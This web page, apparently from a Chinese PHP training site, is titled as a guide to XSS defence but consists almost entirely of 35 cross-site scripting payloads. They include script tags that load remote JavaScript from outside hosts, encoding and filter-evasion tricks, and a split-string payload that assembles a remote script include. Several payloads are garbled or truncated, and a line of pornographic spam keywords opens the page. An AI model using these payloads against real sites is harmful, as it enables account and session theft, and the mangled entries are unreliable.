欧美97色伦欧美一区二区日韩,国产福利片在线观看,freexxx性欧美vide0高清,西西亚洲,日本欧美国产精品第一页久久,成人18免费软件

當前位置: 維易PHP培訓(xùn)學(xué)院 > PHP學(xué)習(xí) > 內(nèi)容正文

PHP安全防范之XSS跨站示例大全

作者:維易PHP培訓(xùn)學(xué)院   時間 2017-05-26

《PHP安全防范之XSS跨站示例大全》要點:
本文介紹了PHP安全防范之XSS跨站示例大全,希望對您有用。如果有疑問,可以聯(lián)系我們。

相關(guān)主題:PHP安全

(1)普通的XSS JavaScript注入

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>


(2)IMG標簽XSS使用JavaScript命令

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>


(3)IMG標簽無分號無引號

<IMG SRC=alert(‘XSS’)>


(4)IMG標簽大小寫不敏感

<IMG SRC=alert(‘XSS’)>


(5)HTML編碼(必須有分號)

<IMG SRC=alert(“XSS”)>


(6)修正缺陷IMG標簽

<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>


(7)formCharCode標簽(計算器)

<IMG SRC=alert(String.fromCharCode(88,83,83))>


(8)UTF-8的Unicode編碼(計算器)

<IMG SRC=jav..省略..S')>


(9)7位的UTF-8的Unicode編碼是沒有分號的(計算器)

<IMG SRC=jav..省略..S')>


(10)十六進制編碼也是沒有分號(計算器)

<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>


(11)嵌入式標簽,將Javascript分開

<IMG SRC=”alert(‘XSS’);”>


(12)嵌入式編碼標簽,將Javascript分開

<IMG SRC=”alert(‘XSS’);”>


(13)嵌入式換行符

<IMG SRC=”alert(‘XSS’);”>


(14)嵌入式回車

<IMG SRC=”alert(‘XSS’);”>


(15)嵌入式多行注入JavaScript,這是XSS極端的例子

<IMG SRC=”alert(‘XSS‘)”>


(16)解決限制字符(要求同頁面)

<script>z=’document.’</script>

<script>z=z+’write(“‘</script>

<script>z=z+’<script’</script>

<script>z=z+’ src=ht’</script>

<script>z=z+’tp://ww’</script>

<script>z=z+’w.shell’</script>

<script>z=z+’.net/1.’</script>

<script>z=z+’js></sc’</script>

<script>z=z+’ript>”)’</script>

<script>eval_r(z)</script>


(17)空字符

perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out


(18)空字符2,空字符在國內(nèi)基本沒效果.因為沒有地方可以利用

perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out


(19)Spaces和meta前的IMG標簽

<IMG SRC=” alert(‘XSS’);”>


(20)Non-alpha-non-digit XSS

<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>


(21)Non-alpha-non-digit XSS to 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>


(22)Non-alpha-non-digit XSS to 3

<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>


(23)雙開括號

<<SCRIPT>alert(“XSS”);//<</SCRIPT>


(24)無結(jié)束腳本標記(僅火狐等瀏覽器)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>


(25)無結(jié)束腳本標記2

<SCRIPT SRC=//3w.org/XSS/xss.js>


(26)半開的HTML/JavaScript XSS

<IMG SRC=”alert(‘XSS’)”


(27)雙開角括號

<iframe src=http://3w.org/XSS.html <


(28)無單引號 雙引號 分號

<SCRIPT>a=/XSS/

alert(a.source)</SCRIPT>


(29)換碼過濾的JavaScript

\”;alert(‘XSS’);//


(30)結(jié)束Title標簽

</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>


(31)Input Image

<INPUT SRC=”alert(‘XSS’);”>


(32)BODY Image

<BODY BACKGROUND=”alert(‘XSS’)”>


(33)BODY標簽

<BODY(‘XSS’)>


(34)IMG Dynsrc

<IMG DYNSRC=”alert(‘XSS’)”>


(35)IMG Lowsrc

<IMG LOWSRC=”alert(‘XSS’)”>


轉(zhuǎn)載請注明本頁網(wǎng)址:
http://www.snjht.com/jiaocheng/98.html


?

    標簽:php  xss跨站